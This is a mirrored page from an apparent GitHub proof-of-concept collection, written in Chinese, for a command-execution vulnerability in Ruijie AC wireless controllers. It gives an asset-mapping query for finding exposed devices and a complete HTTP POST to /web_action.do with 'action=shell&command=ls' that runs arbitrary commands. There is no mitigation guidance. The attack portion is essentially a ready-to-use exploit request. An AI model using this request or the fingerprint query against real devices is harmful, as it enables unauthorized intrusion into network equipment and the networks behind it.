admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/锐捷/锐捷AC无线控制器/锐捷AC无线控制器存在命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.3 KiB
Raw Blame History

锐捷AC无线控制器存在命令执行漏洞

一、漏洞简介
锐捷AC无线控制器存在命令执行漏洞攻击者可通过该漏洞执行任意命令
二、影响版本

锐捷AC无线控制器

三、资产测绘

web.body="简网络,玩智分,无线移动体验 "

●登录1711997786378-edcef547-10cd-420c-832e-a770238eb3f2.png

1711997819097-a4244fdc-1bef-41ee-b4ff-ed704db1c612.png

1711997764050-f8b07f3f-7a50-4784-b518-dde60cd3f693.png

四、漏洞复现

POST /web_action.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

action=shell&command=ls

1711997844450-ea706a57-d350-4ae3-9d94-65913aa37d36.png

更新: 2024-06-24 11:42:25
原文: https://www.yuque.com/xiaokp7/ocvun2/fivwdfbv0bacamon